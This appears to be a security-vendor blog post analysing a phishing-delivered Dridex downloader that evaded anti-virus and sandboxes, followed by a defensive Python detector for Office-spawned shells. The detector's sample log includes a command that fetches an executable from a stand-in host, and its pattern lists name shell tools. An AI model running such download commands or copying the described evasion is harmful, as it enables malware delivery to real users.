Detecting a Dridex Variant that Evades Anti-virus

Attackers constantly tweak their malware to avoid detection. The latest iteration of Dridex we’ve analyzed provides a great example of malware designed to evade anti-virus, sandboxing, and other detection technologies.

How did we get our hands on malware that went undetected by A/V? Since this malware (like the majority of malware) was delivered via a phishing email, we received the sample from a user reporting the phishing email using Reporter.

Here’s a screenshot of the phishing email sent to several of our users:

Figure 1 — Phishing email sent to internal users

In this specific example, the user is presented with a button to double-click in order to “display the content.”

Figure 2 — Button to double-click to view the content

Once double-clicked, the user is presented with a warning box.

Figure 3 — Warning box presented to the user

When the user clicks OK, a command shell is spawned in the background to download a sample of Dridex.

Figure 4 — Dridex being downloaded

So how many AV products flag this downloader as malicious? The surprising answer is none of them.

Figure 5 — 0/57 A/V hits

Since user input is needed to push the button, this bypasses sandbox technology as well! Once the payload is downloaded, the state of detection for Dridex itself is less grim, with 5/57 AV vendors picking up on it.
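Because neither signatures nor an unattended sandbox catch this sample, the behaviour it exhibits on the endpoint is a better detection handle: an Office application spawning a command shell that then pulls a file from the Internet. The following is an added example written for this post, not PhishMe's code or tooling; it assumes process-creation telemetry has been flattened into key=value lines with `host`, `image`, `parent_image` and `command_line` fields (a constructed layout, not any particular SIEM's format), and the sample events, including the URL, are constructed.

```python
"""Flag process-creation events where an Office application launches a shell.

Added example for this post; the log format and sample events are assumed.
"""
import re
from dataclasses import dataclass

# Parent processes that should rarely, if ever, launch a command shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Child processes that indicate a shell or script host was spawned.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Command-line fragments that suggest the shell is fetching a second stage.
DOWNLOAD_HINTS = ("http://", "https://", "downloadfile", "downloadstring")

# Matches key=value pairs; values may be double-quoted and contain backslashes.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


@dataclass
class Alert:
    host: str
    parent: str
    child: str
    reason: str


def parse_event(line):
    """Parse one key=value event line into a dict, stripping surrounding quotes."""
    fields = {}
    for key, value in FIELD_RE.findall(line):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        fields[key] = value
    return fields


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(event):
    """Return an Alert if an Office parent spawned a shell child, else None."""
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    cmdline = event.get("command_line", "").lower()
    if any(hint in cmdline for hint in DOWNLOAD_HINTS):
        reason = "office-spawned shell with download indicator"
    else:
        reason = "office-spawned shell"
    return Alert(event.get("host", "?"), parent, child, reason)


def scan(lines):
    """Run check_event over every line and collect the alerts."""
    return [a for a in (check_event(parse_event(line)) for line in lines) if a]


# Constructed sample events; the hosts, paths and URL are made up for this example.
SAMPLE_LOG = [
    'host=ws01 image="C:\\Windows\\System32\\cmd.exe" '
    'parent_image="C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE" '
    'command_line="cmd.exe /c start http://example.invalid/update.exe"',
    'host=ws02 image="C:\\Windows\\System32\\notepad.exe" '
    'parent_image="C:\\Windows\\explorer.exe" command_line="notepad.exe"',
    'host=ws03 image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'parent_image="C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE" '
    'command_line="powershell.exe -NoProfile"',
    'host=ws04 image="C:\\Windows\\System32\\cmd.exe" '
    'parent_image="C:\\Windows\\explorer.exe" command_line="cmd.exe /c dir"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert.host}: {alert.parent} -> {alert.child} ({alert.reason})")
```

The parent/child pairing is the signal that does not depend on any hash or vendor signature; the command-line hints only raise severity. In production the same logic would read Sysmon Event ID 1 or EDR process-start events rather than constructed lines.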

Figure 6 — A/V hits for Dridex sample

While there is no silver bullet to security, user-generated reports have proven very successful here at PhishMe and other organizations, as many of our users have reported new and interesting threats that target not just us, but industries worldwide. By hooking the human into the security program, we not only find new and interesting malware, but we also close the gap on the kill chain.

Dropper: https://www.virustotal.com/en/file/244126a2873c26f76d9dfa8f993b4209ac8a52fd00a91d98a23c0c90764d1a73/analysis/

Dridex sample: https://www.virustotal.com/en/file/f2328ad463d584ba06cba3338d73b1ee2ba772401d51cf0c88c51aec53bd3623/analysis/1427292890/
